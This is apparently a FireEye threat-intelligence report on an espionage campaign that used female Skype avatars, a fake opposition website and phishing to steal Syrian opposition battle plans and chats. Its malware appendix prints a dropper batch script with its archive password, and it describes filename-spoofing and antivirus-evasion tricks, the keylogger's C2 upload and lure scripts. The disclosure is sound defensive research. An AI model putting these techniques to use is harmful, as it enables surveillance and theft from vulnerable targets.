S P E C I A L   R E P O R T

F I R E E Y E   T H R E A T   I N T E L L I G E N C E 

BEHIND THE  
SYRIAN CONFLICT’S  
DIGITAL FRONT LINES

FEBRUARY 2015

AUTHORS: 
DANIEL REGALADO
NART VILLENEUVE
JOHN SCOTT RAILTON1 

SECURITY 

SPECIAL REPORT

Behind the Syrian Conflict’s Digital Front Lines

CONTENTS

Introduction 

Key findings 

I. Data theft: stealing the opposition’s plans 

II. Victims: serving varied roles in the opposition 

Victims Located in Syria and beyond 

III. Tactics: encountering femme fatale 

Chatting with female avatars 
Seeding malware on social media 
A fake Syrian opposition website 
Social networking profiles and Facebook credential phishing 
One compromised system, multiple victims 

IV. Malware: a range of tools for multiple platforms 

V. Potential threat group sponsorship 

Lebanon: a recurring theme 

Conclusion 

Acknowledgements 

Appendix A: malware analysis 

Multi-stage self-extracting RAR dropper 
ONESIZE Keylogger 
BLACKSTAR, a custom dropper for the DarkComet RAT 
YABROD downloader and CABLECAR launcher 
Detailed analysis 
Python-based backdoor shellcode launcher 
Android backdoors 
Malware samples 

FEBRUARY 2015

 

 

3

5

6

9

10

11

11
13
13
14
14

15

16

17

18

18

19

19
21
24
26
27
28
30
34

1 John Scott Railton is a Research Fellow at the Citizen Lab, Munk School of Global Affairs, University of Toronto and a PhD Student at UCLA

2

SPECIAL REPORT

Behind the Syrian Conflict’s Digital Front Lines

ten armed units working in opposition to Syrian 
President Assad’s regime were planning a major 
operation intended to push a front forward 
against the Syrian government’s forces. They 
carefully laid out their objective—take and hold a 
series of positions and liberate the town of Khirbet 
Ghazaleh, a strategic gateway to the major city of 
Daraa. They used Google Earth to map their 
defensive lines and communicate grid coordinates.

They shared photocopied battle plans and in red 
ballpoint pen added defensive berms, saving 
their plans electronically as pictures. They 
planned for a battle involving between 700 and 
800 opposition forces, who were divided into 
groups to launch separate attacks, including an 
ambush. They mapped out locations for reserve 
fighters, staging areas, and support personnel, 
settled on a field operations area, and planned 
supply routes to resource their forces. They 
sternly told commanders of each unit that they 
could make no ‘individual’ decisions without the 
approval of the Operations element.

3
3

SPECIAL REPORT

Behind the Syrian Conflict’s Digital Front Lines

the attack with a barrage of 120mm mortar fire, followed by an assault against key regime troop locations. 
They drew up lists of men from each unit, with names, birthdates, and other identifying information. They 
used formulas in a colorful Excel spreadsheet to calculate per-man ammunition needs. They arranged and 
assigned heavier weapons to various engagements: several tanks, a BMP fighting vehicle, 14.5mm and 
23mm anti-aircraft guns, B-10 82 mm recoilless rifles, Yugoslav 90mm M79 Osa anti-tank weapons and 
other equipment. 

Finally, they prepared and staffed medical teams and battlefield ambulances. They would have a driver, 
stretcher-bearer, and two armed elements for additional support. 

We uncovered these battle plans in the course of 
our ongoing threat research. It quickly became 
apparent that we had come across stolen 
documents containing the secret communications 
and plans of Syrian opposition forces that had 
fallen victim to a well-executed hacking operation. 
Between at least November 2013 and January 
2014, the hackers stole a cache of critical 
documents and Skype conversations revealing the 
Syrian opposition’s strategy, tactical battle plans, 
supply needs, and troves of personal information 
and chat sessions belonging to the men fighting 
against Syrian President Bashar al-Assad’s forces. 
While we do not know who conducted this hacking 
operation, if this data was acquired by Assad’s 
forces or their allies it could confer a distinct 
battlefield advantage.

To undertake this operation, the threat group 
employed a familiar tactic: ensnaring its 
victims through conversations with seemingly 
sympathetic and attractive women. A female 
avatar would strike up a conversation on Skype 
and share a “personal” photo with her target. 
Before sending the photo she typically asked 
which device the victim was using—an Android 
phone or a computer—likely in an effort to send 
appropriately tailored malware. Once the target 
downloaded the malware-laden photo, the threat 
group accessed his device, rifled through files and 
selected and stole data identifying opposition 
members, their Skype chat logs and contacts, and 
scores of documents that shed valuable insight 
into military operations planned against President 
Assad’s forces. 

4

SPECIAL REPORT
SPECIAL REPORT

Behind the Syrian Conflict’s Digital Front Lines

KEY FINDINGS

DATA THEFT

VICTIMS

TACTICS AND 
TECHNIQUES

MALWARE

POTENTIAL 
SPONSORSHIP

The threat group 
stole hundreds of 
documents and some 
31,107 logged Skype 
chat sessions that 
included discussions 
of plans and logistics 
of the Syrian 
opposition’s attacks 
on Assad’s forces. 

Targeted individuals 
included armed 
opposition members, 
media activists, 
humanitarian aid 
workers, and others.  
The victims are located 
in Syria, the region  
and beyond.

The threat group 
employed a diverse 
malware toolset that 
implied access to 
development resources. 
They used both widely 
available and custom 
malware to breach 
their targets, including 
the DarkComet RAT, a 
customized keylogger, 
and tools with different 
shellcode payloads. 

While we have only 
limited indications 
about the origins of 
this threat activity, 
our research revealed 
multiple references to 
Lebanon both in the 
course of examining 
the malware and in 
the avatar’s social 
media use.

The threat actors used 
female Skype avatars to 
chat with their targets 
and infect their devices 
with malware. “She” 
typically asked her 
intended victim if he 
was using Skype on an 
Android or a computer, 
in a likely attempt to 
send malware tailored 
to the device. The 
threat group also 
maintained a seemingly 
pro-opposition website 
containing links to 
malicious downloads 
and Facebook profiles 
with malicious links as 
well. They conducted 
these operations using 
servers located outside 
of Syria.

5
5

I. DATA THEFT:  
STEALING THE OPPOSITION’S PLANS

T he threat group amassed a significant 

amount of data, from Skype account 
databases to planning documents and 

spreadsheets to photos. The victims created the 
majority of the data from May 2013 to December 
2013. Some of the stolen Skype databases 
included chat history going back to 2012 and 
activity as recent as January 2014. The threat 

group chose what it stole carefully, there were 
only a few instances where the group downloaded 
movies, empty files, end user licensing 
agreements, baby pictures, school papers, and 
other seemingly extraneous material. We have 
summarized the major types of information 
contained in the stolen data in the table below:

TYPES OF STOLEN INFORMATION

MILITARY 
INFORMATION

POLITICAL 
INFORMATION

HUMANITARIAN 
ACTIVITIES AND 
FINANCING

REFUGEE PERSONAL 
INFORMATION

MEDIA AND 
COMMUNICATIONS

•	 Conversations	
and documents 
planning military 
operations 

•	 Details	on	military	

hardware and 
positions of 
fighting groups

•	 Names	of	members	

of fighting groups 
and their weapons 
systems

•	 Political	strategy	

•	 Humanitarian	needs	

•	 Applications	

discussions

assessments 

•	 Political	tracts,	
manifestos, and 
alliances within the 
opposition 

•	 Lists	of	materials	for	

the construction of 
major refugee camps

•	 Humanitarian	

financial assistance 
disbursement records

for assistance 
by refugees to 
authorities in Turkey

•	 Lists	of	aid	recipients,	

•	 Documents	
and strategy 
information 
pertaining to media 
releases

scans of ID cards

•	 Situation	reports	

and lists of 
casualties

•	 Information	about	

rights abuses

66

SPECIAL REPORT

Behind the Syrian Conflict’s Digital Front Lines

STOLEN DATA

OF STOLEN DATA7.7 GB 
12,356 

CONTACTS

64SKYPE ACCOUNT 
31,107 
240,381 MESSAGES

CONVERSATIONS

DATABASES

MILITARY INFORMATION
The threat group took a range of military-related 
information, and seemed to pay special attention 
to files that contained lists of names. We found 
dozens of lists identifying hundreds of fighters 
serving in armed opposition groups. Some lists 
included names and birthdates, while others noted 
the weapons and serial numbers each man carried, 
their blood types, and their phone numbers.

The threat group also took Skype chat logs, in 
which mundane conversations often transitioned 
into sensitive communications about strategy, 
logistical issues, and supply routes, and frank 
assessments of recent engagements with the 
enemy. In one chat, opposition members discuss 
the movement of a shipment of 9M113 TOW 
missiles and launchers, and agree upon a time  
and location to handover the weapons. 

The threat group also stole lists of officers 
in Assad’s forces, and pictures of suspected 
Hezbollah operatives captured or killed inside 
Syria, as well as pictures of fighting-age men with 
weapons and in irregular uniforms posing for the 
camera or exploring battle damaged towns.

Sometimes, the threat group would take whole sets 
of files pertaining to upcoming large-scale military 
operations. These included correspondence, 
rosters, annotated satellite images, battle maps, 
orders of battle, geographic coordinates for 
attacks, and lists of weapons from a range of 
fighting groups. 

We identified records of the number of Kalashnikovs 
and light machine guns taken, materials found, and 
casualties suffered during operations. One such 
report describes capturing a warehouse filled 
with chemical weapons protective equipment, 
suits, cleaning products, and possibly antidotes. 
The report did not mention whether any chemical 
agents were found. 

POLITICAL INFORMATION
The Skype chat logs likely provided the threat 
group with an inside view into the politics of 
the Syrian opposition, as individuals discussed 
coalitions, criticized people, and shifted alliances. 
In addition to the Skype logs, the threat actors 
also stole a large number of documents detailing 
opposition political structures, including the 
formation of political parties, political support, 
and shifting allegiances in the diaspora. 

HUMANITARIAN ACTIVITIES  
AND FINANCING
The threat actors also stole a wide range of 
material concerning humanitarian activities in 
Syria and bordering countries. These included 
many lists of humanitarian needs, such as per-
family lists of blanket and mattress distribution in 
refugee camps. The threat actors stole records of 
financial assistance, and money sent per-month 
to opposition groups within the country. 

7

SPECIAL REPORT

Behind the Syrian Conflict’s Digital Front Lines

MAP OF SYRIAN OPPOSITION BATTLE PLANS

Opposition battle 
plans were stolen 
that included 
information about the 
emplacements of anti-
government forces. 
The stolen plans are 
high-value artifacts 
that may have 
provided actionable 
military intelligence 
to the recipients. This 
redacted map shows 
part of an attack plan 
against Assad's forces 
military encampment 
(red rectangle).

The threat group stole data such as personal updates, 
lists of casualties, and documents discussing 
investigations into the use of chemical weapons. 

REFUGEE PERSONAL INFORMATION
We also found that the threat actors had stolen 
information pertaining to Syrian refugees in Turkey 
and elsewhere. Refugees must provide a range of 
documentation to the relevant authorities in order 
to receive benefits from the host country. The 
threat group had obtained filled-out applications 
for assistance and education, and even the scanned 
ID cards of refugees and their CVs. We found 
photos depicting Syrian families in Turkish refugee 
camps, and children next to cars in temporary 
refugee housing.

MEDIA AND COMMUNICATIONS 
OPERATIONS
Several of the threat group’s victims engaged in 
media activities on behalf of the revolution. The 
threat group stole data such as personal updates, 
lists of casualties, and documents discussing 
investigations into the use of chemical weapons. In 
some cases, the threat actors also stole composite 
images of fighters killed in battle, as well as the 
original photographs from which they were taken.

CREDENTIALS
The threat group also obtained user account 
information, possibly to continue monitoring the 
opposition’s communications. The threat actors 
collected Facebook account information through 
the use of a fabricated login page, and believe that 
they relied on Remote Access Trojans (RATs) and 
extensive keylogging to obtain credentials as well.

8

II. VICTIMS:  
SERVING VARIED ROLES  
IN THE OPPOSITION

W e analyzed the stolen Skype databases 

to find out what roles the victims 
served in the opposition and to 

understand the connections between the victims. 
First, we scanned the contents of the victims’ chat 
logs to identify other victims. We then surmised 
that the number of shared contacts between 

the Skype accounts illustrated the relationships 
between victims. We were also able to ascertain 
more about the victims’ roles and work from the 
chat logs. For further explanation, see Appendix B: 
Social Media Analysis of Victim Skype Databases.

Profiled below are four sample victims:

AN OPPOSITION LEADER

A DEFECTOR 

A HUMANITARIAN

A MEDIA ACTIVIST 

The threat group 
compromised the computer 
of an individual who appears 
to be the leader of an armed 
unit. In addition to stealing 
Skype conversations about 
sensitive military and 
logistics topics, the threat 
actors also took a series of 
folders marked “Very Special 
File” that contained plans 
and logistics information for 
an upcoming battle. 

This victim appeared to 
be a high-profile defector; 
a formerly high-ranking 
officer in Assad’s security 
services. The threat group 
took multiple files from 
his computer, including 
documents on forming armed 
coalitions and political groups 
and his complaints to the local 
Internet Service Provider 
about the bad service in his 
new home. While the threat 
actors had not taken Skype 
logs from his computer, they 
did take his CV and other 
personal documents.

Several victims appeared to 
be individuals working on 
supplies and humanitarian 
operations, including an aid 
coordinator for a charity 
based in Turkey. Among the 
documents stolen from his 
system were his CV and a 
picture of a border crossing 
showing bundles of goods 
passing across a river (possibly 
the Orontes River near Idlib).

The threat group targeted 
a young media activist who 
appeared to be based inside 
Syria, working with a local 
media center. The threat 
group compromised his 
computer, stealing meeting 
minutes, as well as a series 
of videos that recorded 
meetings with other media 
activists. They also took lists 
of casualties and documents 
pertaining to investigations 
of chemical weapon attacks.

9

12 TURKEY

+

1LEBANON

2 EGYPT

+

29 SYRIA

+

3 JORDAN

SPAIN

1

+

1UKRAINE

13 UNKNOWN

2 UAE

+

Figure 1: Geographic Location of Victims based on 
Victim’s Skype profiles

VICTIMS LOCATED IN SYRIA  
AND BEYOND
Among the victims were individuals who 
appear to be linked to the Free Syrian Army 
(a set of groups united by their opposition 
to Assad), Islamist fighting groups, and 
individuals with no clear group affiliation. 
Some of the victims appear to operate within 
opposition-controlled areas of Syria, while 
others are more likely located within the 
broader diaspora networks in Lebanon, 
Jordan, and the Persian Gulf. 

10

III. TACTICS:  
ENCOUNTERING FEMME FATALE

The threat group primarily compromised its 

victims using female avatars to strike up 
conversations on Skype and connect on 

Facebook. They also used a fake, pro-opposition 
website seeded with malicious content.

CHATTING WITH FEMALE AVATARS
The threat group created several Skype accounts 
with female avatars to target (male) individuals in 
the Syrian opposition. The female avatars, which had 
generic but country-appropriate names and profile 
images, would develop a rapport with the victim 
before sending a malicious file. The female avatars 
approached their targets with a series of personal 
questions that appeared to be part of a script

The first two questions would generally be: 

  Monday 20:14

and

  Tuesday 22:07

We believe the first question about the victim’s 
Skype access determined whether the victim 
received malware designed to compromise a 
computer or a mobile device.2 The avatar would 
request a photo of the target, then send a “personal 
photo” of a woman in return. The avatar’s “photo” 
was actually an executable file (a self-extracting 
RAR archive) renamed with the .pif file extension.3 
When the victim “opened” the photo, a woman’s 
picture was displayed while the SFXRAR executed 
and ultimately installed the DarkComet RAT in 
the background. From this point on, the victim’s 
computer was under the threat group’s control.

The other personal questions presumably 
helped the threat actors systematically collect 
information from each of their targets. The threat 
actors would sometimes reinitiate chat sessions 
with victims after a period of inactivity to collect 
additional details. For example, we observed a 
female avatar engage one victim in lengthy chats 
about Syrian refugees in Beirut. After successfully 
compromising the target, the conversations 
stopped. Later “she” briefly re-emerged to ask the 
victim if he had previously served in the Syrian 
Arab Army (Assad’s forces). After getting an 
affirmative answer, she again went silent. 

2  While we did not see the threat actors deploy Android malware via Skype, they had access to Android malware (see Appendix A) that could have been used in 

a similar fashion.

3 https://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/windows_pif_create.mspx

11

SPECIAL REPORT

A REPRESENTATIVE CHAT WITH “IMAN”*

AVATAR

AVATAR

TARGET

TARGET

14:42

14:43

TARGET

AVATAR

AVATAR

AVATAR

15:04

TARGET

TARGET

15:07

AVATAR

THREAT ACTOR: 

TARGET

The target receives an 
initial contact request 
from the female avatar. He 
accepts the request. “She” 
then asks, “are you using 
Skype on your phone or 
your PC?”

The avatar responds with 
a request for a picture. 
The target then sends a 
picture, which the avatar 
compliments. “She” follows 
up with a request for his 
age and says her own 
birthdate. He replies with 
apparent surprise that they 
have identical birthdays, 
though one year off.

It probably wasn’t a 
coincidence. His birthday is 
on his Skype profile, which 
would have been visible to 
the threat actor.

After they chatted a bit 
more, she explained that 
she is a “computer engineer 
working at a programming 
company in Beirut” and 
sends a file that the avatar 
claims is a picture of her.

The target becomes a victim 
when the picture is opened. 

14:27

14:35

14:41

14:45

15:05

15:06

15:37

15:39

SEND

12

SPECIAL REPORT

Behind the Syrian Conflict’s Digital Front Lines

Figure 2: The Skype avatar’s corresponding Facebook profile

Figure 3: Another female avatar posting malware links 
on her Facebook profile

SEEDING MALWARE ON SOCIAL MEDIA
The Skype avatar had a matching Facebook profile 
with the same photo. “Her” profile, populated with 
pro-opposition content, contained many posts 
with malicious links. The links invite visitors to 
install security tools like VPNs and Tor, or access 
important documents.

A FAKE SYRIAN OPPOSITION WEBSITE
The malware that the Skype avatars and social 
media profiles encouraged their victims to 
download shared the same host server as malware 
distributed through a website (80.241.223.128) 
purporting to be supportive of the Syrian 
opposition. The threat actors used this website 
to target opposition members interested in 
news about the conflict. Much of the websites’ 
content was scraped from the website of the 
Syrian American Council, a U.S.-based non-profit 
that advocates for democracy in Syria. In order 
to watch videos on this website, the viewer is 
prompted to download a Flash Player update that 
is actually malware (see Figure 4 and Figure 5).

Threat actors also included download prompts  
for legitimate video chat software bundled  
with malware.

Figure 4:  
Prompt to install  
the malware

Figure 5:  
Saving malicious  
flash installer

13

Figure 6: Fake Facebook login page

Figure 7: Profiles in the phishing site

SOCIAL NETWORKING PROFILES AND 
FACEBOOK CREDENTIAL PHISHING
The fake opposition website also includes what 
appears to be a matchmaking section (Figure 6) 
that covertly channels targets toward installing 
malware. This section of the site contains 
womens' profiles, each of which is populated with 
information indicating age, location and interests 
as well as other personal information. The profiles 
also contain links to a “LiveCam ID” as well as the 
“Facebook Profile” of each woman. Clicking on the 
“LiveCam ID” link directs the user to a download 
page including Live-Chat-ooVoo-Setup.exe, a 
malicious bundling of ooVoo (a legitimate program). 
Clicking on a Facebook profile links to a fake 
Facebook login page that is actually a phishing page 
used to collect credentials (Figure 7).

ONE COMPROMISED SYSTEM,  
MULTIPLE VICTIMS 
The threat group manually created a directory 
on its server for each compromised computer. 
These directories often contained multiple stolen 
Skype databases indicating that the victims shared 
computers. The threat group was likely able to 
acquire large collections of data by breaching only 
a relatively small number of systems due to the 
opposition’s use of shared computers for satellite-
based Internet access.

Sharing computers is likely a function of the 
realities of limited internet service in Syria. The 
multi-day Internet and phone blackouts that 
began occurring in Syria in 2012 (possibly the 
Syrian government’s attempts to stifle opposition 
forces’ communication capabilities, with some 
exceptions4) have driven opposition groups, media 
activists, political groups, and others to set up 
their own satellite communications systems for 
reliable two-way satellite Internet connectivity. 
Typically, they use 2-way satellite communications 
equipment known as Very Small Aperture 
Terminals (VSATs) connected to consumer grade 
networking equipment, like Wi-Fi routers. VSATs 
provide an expensive Internet lifeline to many 
groups within opposition-controlled parts of Syria. 

Due to expensive bandwidth, limited electricity, 
setup time, and the need to operate VSATs from 
a fixed location, individuals supporting a wide 
variety of Syrian opposition efforts often share 
connections and computers located in places like 
local media centers and operations rooms.5 As 
a result, a threat actor who successfully infects 
one person on a shared device can easily steal the 
Skype databases and stored documents of several 
targeted individuals or organizations as well.

The threat group was likely able to acquire large 
collections of data by breaching only a relatively small 
number of systems due to the opposition’s use of shared 
computers for satellite-based Internet access. 

4  http://www.washingtonpost.com/blogs/worldviews/wp/2012/11/30/can-u-s-communication-kits-help-syrians-get-around-the-Internet-blackout/

5 http://www.cbsnews.com/news/to-fight-assad-syrian-opposition-logs-on-at-any-cost/

14

IV. MALWARE:  
A RANGE OF TOOLS  
FOR MULTIPLE PLATFORMS

The threat group’s tools and tactics differ 

somewhat from those observed in previous 
activity targeting the Syrian opposition.6 

Although this threat group uses the known tactic 
of deploying the DarkComet RAT, they do so using 
a multistage dropper that has not been previously 
observed. The group also uses a keylogger and what 
appear to be custom tools with shellcode payloads. 

The threat actors have used these tools in 
conjunction with techniques such as:

Multi-stage droppers incorporating password-
protected self-extracting RAR archives

Memory injection using process replacement

Multi-stage payloads

Use of an XOR key to decode a shellcode payload, 
where the components used to generate the XOR 
key are distributed in two separate files (a PDF and 
an EXE)

This is also the first instance we have observed a 
threat group targeting the Syrian opposition using 
Android malware. Smart phones, in general, are 
valuable sources of data about individuals and their 
social networks, as they may contain address books, 
SMS messages, email, and other data (including data 
from mobile apps, such as Skype). Targeting Android 
may be particularly beneficial in the case of Syrian 
opposition members, where regular power blackouts 
in Syria may force people to rely more heavily on 
mobile devices for communications.

Despite the wide array of tools and techniques at 
their disposal, the threat group does not appear to 
use software exploits to deliver malware to their 
targets. Instead, they seem to rely on a variety of 
social engineering techniques to trick victims into 
infecting themselves.

Although this threat 
group uses the known 
tactic of deploying the 
DarkComet RAT, they  
do so using a multistage 
dropper that has not been 
previously observed.

6  See, for example: https://www.eff.org/document/quantum-surveillance-familiar-actors-and-possible-false-flags-syrian-malware-campaigns; 

https://securelist.com/files/2014/08/KL_report_syrian_malware.pdf; https://citizenlab.org/2014/12/malware-attack-targeting-syrian-isis-critics/

15

V. POTENTIAL THREAT  
GROUP SPONSORSHIP

T he threat group’s tools and tactics stand in 

contrast to the ways in which other Syrian 
groups (described publicly by a variety of 

researchers) have operated. In addition, while we 
do not have sufficient information to determine 
the identity of this group or the nature of its ties 
to Assad’s forces, we have some indications that 
the group may be resourced and / or located 
outside of Syria.

The malware used by this threat group does 
not share any command and control servers 
with previously reported activity documented 
by research groups including Kaspersky, Trend 
Micro, CitizenLab, and the Electronic Frontier 
Foundation (EFF).7 In addition, the activity does 
not share any of the tactics or tools with activity 
profiled in another recently released report on 
potentially ISIS-linked malware in Syria.8

The threat group used a variety of malware, 
suggesting access to development tool resources. 
For example, while other Syrian threat groups have 
used DarkComet and other RATs extensively, this 
group deploys DarkComet using a custom dropper 
(BLACKSTAR) that may make the malware more 
difficult to detect. This threat group is also unique 
to date in leveraging the Metasploit Framework, 
custom malware tools (YABROD and CABLECAR), 
and Android malware. This demonstrates that 
the threat group is capable of acquiring and using 
a diverse malware arsenal. It remains unclear if 
they have developed this capacity internally or are 
receiving outside support.

Finally, public reports of other suspected pro-
Syrian threat actors have identified those groups’ 
primary or fallback command and control (C2) 
servers as located within Syria itself (e.g., resolving 
to or directly referencing Syrian IP addresses, 
often in similar IP ranges.) However, this group’s 
C2 servers were located outside of Syria. This may 
indicate that the group is not based in Syria itself, 
or that its sponsor’s resources do not include 
the ability to provide the group with dedicated 
servers located in Syria.

7  https://www.eff.org/document/quantum-surveillance-familiar-actors-and-possible-false-flags-syrian-malware-campaigns 

https://securelist.com/files/2014/08/KL_report_syrian_malware.pdf

8  https://citizenlab.org/2014/12/malware-attack-targeting-syrian-isis-critics/

16

SPECIAL REPORT

Behind the Syrian Conflict’s Digital Front Lines

Figure 8: Avatars 
referencing Lebanon

LEBANON

BEIRUT

LEBANON: A RECURRING THEME
While researching this activity, we came 
across numerous references to Lebanon. 
We observed a user in Lebanon upload 
what appear to be two test versions 
of malware used to target opposition 
elements (the YABROD downloader and 
the CABLECAR launcher). The avatars, 
social media seeding, and fake opposition 
website are also filled with references 
to Lebanon. During chats, for example, the 
female avatars often state that they are in 
Lebanon and demonstrate familiarity and 
interest in talking about issues there. Social 
media pages suggest that the avatars are 
refugees in the country, or are Lebanese. 

While researching the threat group’s 
tactics, we came upon a reference to a 
3-day training course in Lebanon in 2012 
that described the use of eerily similar 
methods. According to media reports, a 
leaked Syrian intelligence memo titled 
"Training Course for Internet and Social 
Media Activists" describes the tactics that 
pro-Assad recruits—many of whom were 
Lebanese members of Hezbollah's Islamic 
Resistance—were trained to use.9 Do 
note that we are unable to determine the 
authenticity of the document, or whether it 
may represent disinformation.

The training included:

Establishing an "Electronic Army" to infiltrate 
Syrian activists’ computers, websites and 
Internet accounts, and attempting to use 
stolen personal information against them.

Setting up opposition social media accounts 
to spread false information and make 
accusations and counter-accusations 
to create conflict between opposition 
members in and out of Syria.

The use of women to entrap opposition 
members and activists using social media 
sites such as Skype and Facebook.10

9  http://alkhaleejonline.net/#!/articles/1414221806705481300/, English translation available here: http://syria-cyber-warfare-intel-leak.pen.io

10  http://syria-cyber-warfare-intel-leak.pen.io

17

CONCLUSION

A t first glance, this group’s activity follows 

a familiar plot line: threat actors socially 
engineer their way into individuals’ 

computers and then steal data. However, like all 
great plots, this one comes with a twist. The group 
regularly asked its targets about the device they 
used—computer or Android phone—probably so 
that they could then deploy malware specifically 
tailored to that device. In addition to the range 
of military and political documents stolen, the 
group focused on the victim’s Skype databases, 
which included the victim’s contacts and real time 
communications, providing the threat actors with 
an inside view into the opposition’s relationships 
and plans. We suspect they often found their next 
targets in the victim’s Skype contacts as well. As 
the warzone reality of expensive satellite internet 
forced opposition members to rely on shared 
devices, compromising a single device yielded the 
combined plans and communications of multiple 
aspects of the opposition.

Unlike other threat activity that we have profiled, 
this is not just cyber espionage aimed at achieving 
an information edge or a strategic goal. Rather, 
this activity, which takes place in the heat of a 
conflict, provides actionable military intelligence 
for an immediate battlefield advantage. It provides 
the type of insight that can thwart a vital supply 
route, reveal a planned ambush, and identify and 
track key individuals. This intelligence likely serves 
a critical role in the adversary’s operational plans 
and tactical decisions. However, this tactical edge 
comes with a potentially devastating human cost. 

ACKNOWLEDGEMENTS
Kristen Dennesen 
Laura Galante 
William Gibb 
Erye Hernandez 
Mary Beth Lee 
Ned Moran  
Vinay Pidathala 
Michael Shoukry 
Jen Weedon 
Jinjian Zhai 

18

APPENDIX A:  
MALWARE ANALYSIS

MULTI-STAGE SELF-EXTRACTING RAR DROPPER
This threat group frequently uses social engineering to attempt to trick victims into infecting themselves 
by running malware disguised as a legitimate file, which we call the “lure”. In some cases the file appeared to 
be valid software installation program (e.g.,install_flashplayer11x32_gdrd_aih.exe). In other cases, 
the group used the non-printable Unicode right-to-left override character11 to make executable files appear 
as PDFs, JPGs, or other non-malicious content (e.g., Syrian-Girl-Against-Regime[Unicode]gpj.exe., 
which would be displayed to a user as Syrian-Girl-Against-Regime.exe.jpg).

In each case, the “lure” file was actually a self-extracting RAR archive (SFXRAR), typically containing a decoy 
file and a second, password-protected SFXRAR that contained the actual malware. The files are executed to 
deploy the malware as shown in Figure 9.

Figure 9: Multi-stage RAR Dropper

1

Extract RAR1 
and run installer

Download binary

RAR 1 
Installer 
Decoy

Dropper

RAR 2

Malware

2

Run dropper
Provide RAR 2 
Password

Installer

Show 
Decoy

3

Dropper
RAR 2

Malware
Run 
Malware
4

Extract 
RAR 2

System 
Infection

11   http://blogs.msdn.com/b/ericfitz/archive/2011/08/22/off-topic-unicode-right-to-left-override-character-used-by-malware.aspx

19

Figure 10: Files dropped by the first SFXRAR

Figure 11: Content of BBAG.bat script

BBAG.bat 
combine.bat 
flashplayer11.exe 
hide.vbs 
Update-flashplayer11.sfx.exe

@echo off 
Update-flashplayer11.sfx.exe -pWh@t1sTh3re -d%temp% 
flashplayer11.exe -d%temp%

1.  The “lure” is a SFXRAR archive (“RAR 1”) that contains one or more installer batch (.bat) scripts 

and / or Visual Basic (.vbs) scripts (generically referred to as the “Installer”, above); a non-malicious 
decoy file (Word or PDF document, JPG image, or legitimate software installation program, the 
“Decoy”); and a second, password-protected SFXRAR archive containing the malware (the “Dropper” 
/ “RAR 2”). Since the malware is in a password-protected file, it can’t be scanned by antivirus 
software. In step 1, RAR 1 executes, writes its contents to disk, and launches the installer scripts.

2.  When the installer scripts execute, they provide a password to open RAR 2 and launch the decoy file.

3.  The decoy file is displayed to the victim (or executed, if the decoy is a legitimate application).

4.  The malware is extracted from the password-protected RAR 2 and executed, compromising the system.

For example, visitors attempting to view videos on the threat group’s fake website 
were prompted to download the file install_flashplayer11x32_gdrd_aih.exe 
(6608ce246612d490f3b044627a5e6d9e). While the file appeared to be an installation program for 
Adobe Flash, it was actually an SFXRAR archive containing the files shown in Figure 10.

The file flashplayer11.exe (b44da59fdaf10fea8bce51772f67b9a9) was the “decoy” 
file – a legitimate, digitally-signed Adobe binary. The file Update-flashplayer11.sfx.exe 
(a1e0d40715f66f30aad44ab4c15a474a) was a password-protected SFXRAR file. The BBAG.bat file 
extracts and launches the SFXRAR using the password “Wh@t1sTh3re” on the command line and launches 
the decoy to start the legitimate Flash player installation process, as shown in Figure 11.

The SFXRAR in turn extracts and executes the malicious file flashplayer11x32_gdrd_aih.exe 
(b68a7e216cb0d18030048935b67e0d68) which is a copy of the ONESIZE keylogger.

20

Figure 12: Content of the key log file

ONESIZE KEYLOGGER
ONESIZE has been distributed using the multi-stage SFXRAR dropper method described above. ONESIZE 
uses the GetAsyncKeyState API to intercept input from the keyboard. The malware stores logged keystrokes 
to %temp%\keys.txt. A sample log file is shown in Figure 12:

ONESIZE collects information about the infected computer, including the hostname, OS name, registered 
owner, install date, system type, BIOS version, system and input locale (to detect the language), domain, 
logon server, and hotfixes installed. The system information is transmitted to a hard-coded command and 
control (C2) server (80.241.223.128:2007), as shown in Figure 13:

Figure 13: System information sent to the ONESIZE C2

connect to [80.241.223.128] from Lab-PC  
[80.241.223.128] 49232

Host Name: LAB-PC 
OS Name: Microsoft Windows 7 Professional 
OS Version: 6.1.7601 Service Pack 1 Build 7601 
OS Manufacturer: Microsoft Corporation 
OS Configuration: Standalone Workstation 
OS Build Type: Multiprocessor Free 
Registered Owner: Lab 
Registered Organization: 
...

ONESIZE also uploads the key log file to the same C2 server. ONESIZE checks to see whether the current 
key pressed is greater than 0x26 and less than or equal to 0x5A, or any of the following virtual keys:

VK_OEM_COMMA 
VK_OEM_2 
VK_OEM_3 
VK_OEM_4 
VK_OEM_5 
VK_OEM_6 
VK_OEM_7 

21

Figure 14: UniLogger Github source code snippet

If so, and if the key log file is equal to or greater than 4096 bytes (0x1000) in size, the log is uploaded to the 
C2 server. If these conditions are not met, then the current key pressed is simply written to the log file.

ONESIZE may leverage source code12 from the publicly available UniLogger Keylogger.13 UniLogger 
supports Unicode, which means it is capable of logging keystrokes from keyboards configured for Unicode 
languages such as Arabic, Chinese, and Russian. 

Both ONESIZE and UniLogger may use the same source code to record keystrokes. Figure 14 shows part 
of the UniLogger source code, which calls Sleep with the rand function somewhat uniquely and searches 
virtual-key codes from 8 to 222.14 Figure 15 shows a partial disassembly of ONESIZE; the Sleep and rand 
functions are visible, as well as the virtual key codes from 8 to 222.

Figure 15: ONESIZE partial disassembly

12  https://github.com/SherifEldeeb/UniLogger/blob/master/Source.cpp

13  http://eldeeb.net/wrdprs/?page_id=229

14  The malware determines if a key is pressed by iterating through all the virtual keys starting from 8 and ending with 222 and checking the return value of the 

GetAsyncKeyState API (a return value of -32767 (0x8001) means key down and pressed since the last check).

22

SPECIAL REPORT

SPECIAL ASSIGNMENT

PERSON 2

In this redacted, translated, 
and excerpted conversation 
the leader of an opposition 
fighting group is offered a 
fighting job: launch an attack 
on a particular airport. The 
emphasis on communications 
discipline, and the need 
for documentation are 
both notable.  The need for 
photographic proof suggests 
a need for verification by a 
distant party, perhaps the 
“funder” who is said to be 
in Saudi Arabia. Perhaps 
photographic proof is also 
important for a group (or 
funder’s) reputation and 
being able to claim credit for 
a particular attack.

In full form, this conversation 
reveals several pieces of 
sensitive military information 
regarding the opposition’s 
approach to launching, 
funding, and operationalizing 
an attack plan. The potential 
real-time surveillance 
of opposition wartime 
discussions could provide the 
Assad regime with valuable 
intelligence about ongoing or 
planned military campaigns, 
identification of who funds 
the opposition, and how 
the operational financial 
infrastructure works.

PERSON 2

  Monday 19:27

PERSON 1

  Monday 19:28

  Monday 19:37

  Monday 19:38

  Monday 19:46

  Monday 19:47

  Monday 19:56

  Monday 20:07

  Monday 20:08

